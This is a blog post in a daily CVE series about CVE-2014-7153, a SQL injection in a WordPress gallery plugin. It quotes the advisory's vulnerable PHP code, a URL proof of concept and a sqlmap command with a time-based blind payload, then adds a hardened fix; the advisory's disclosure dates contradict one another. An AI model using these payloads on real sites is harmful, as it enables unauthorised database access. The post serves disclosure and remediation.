iT邦幫忙

DAY 3

Daily CVE series, part 3

SQL Injection - CVE-2014-7153

Introduction

CVE-2014-7153 is a SQL injection in versions 1.0.0 and 1.0.1 of the Huge IT Image Gallery plugin for WordPress: in admin/gallery_func.php, the editgallery function uses the removeslide parameter without any filtering.

Warning

Affected versions: 1.0.0 & 1.0.1

The problem

######################

Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

Exploit Author : Claudio Viviani

Vendor Homepage : http://huge-it.com/

Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip

Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs

Date : 2014-08-25

Tested on : Windows 7 / Mozilla Firefox

Linux / Mozilla Firefox

Linux / sqlmap 1.0-dev-5b2ded0

######################

Location :

http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php

######################

Vulnerable code :

function editgallery($id)
{
    global $wpdb;

    if (isset($_GET["removeslide"])) {
        if ($_GET["removeslide"] != '') {
            // $_GET["removeslide"] is concatenated straight into the query,
            // with no casting or escaping, so its content reaches MySQL as SQL.
            $wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." ");
        }
    }
    // ... remainder of editgallery() not shown in the advisory
}

######################

PoC Exploit:

http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \
-p removeslide --dbms=mysql --level 3

[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable
...
...
...

Place: GET
Parameter: removeslide
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

PoC Video:

https://www.youtube.com/watch?v=gAmb0_o3ZUc

######################

Vulnerability Disclosure Timeline:

2014-08-25: Discovered vulnerability
2014-08-26: Vendor Notification (Web Customers Service Form)
2014-08-26: No Response/Feedback
2014-08-01: Plugin version 1.0.1 released without fix
2014-08-02: Public Disclosure

#####################

Discovered By : Claudio Viviani
http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

-- Source: packetstormsecurity
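
A hardened form of the removeslide handling, added here as an example; it is not the plugin's own code and not part of the advisory. It assumes it runs inside WordPress ($wpdb, absint(), current_user_can(), check_admin_referer() available); the capability name and nonce action are assumptions, the table name is the one from the advisory.

```php
<?php
// Added example, not the plugin's code. Assumes WordPress is loaded.
// 'manage_options' and 'huge_it_remove_slide' are assumed names.
function editgallery_remove_slide_hardened() {
    global $wpdb;

    if ( ! isset( $_GET['removeslide'] ) || $_GET['removeslide'] === '' ) {
        return false;
    }

    // Only users allowed to manage the gallery may delete slides
    // (assumed capability; the plugin's real capability check is not on the page).
    if ( ! current_user_can( 'manage_options' ) ) {
        return false;
    }

    // Require a valid nonce so a crafted admin link cannot trigger the delete
    // (assumed nonce action name). check_admin_referer() dies on failure.
    check_admin_referer( 'huge_it_remove_slide' );

    // The id column is an integer. absint("1 and 1=2") would silently yield 1,
    // so first require the raw value to consist of digits only and reject
    // anything else outright instead of quietly truncating it.
    $raw = (string) wp_unslash( $_GET['removeslide'] );
    if ( ! ctype_digit( $raw ) ) {
        return false;
    }
    $id = absint( $raw );
    if ( 0 === $id ) {
        return false;
    }

    // Parameterised delete: $wpdb->delete() binds the value with the %d
    // format itself, so user input can never change the SQL structure.
    // (Equivalent: $wpdb->query( $wpdb->prepare( "DELETE FROM {$wpdb->prefix}huge_itgallery_images WHERE id = %d", $id ) ).)
    $deleted = $wpdb->delete(
        $wpdb->prefix . 'huge_itgallery_images',
        array( 'id' => $id ),
        array( '%d' )
    );

    return false !== $deleted;
}
```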

Conclusion

Update to the latest version, 1.1.0, immediately!

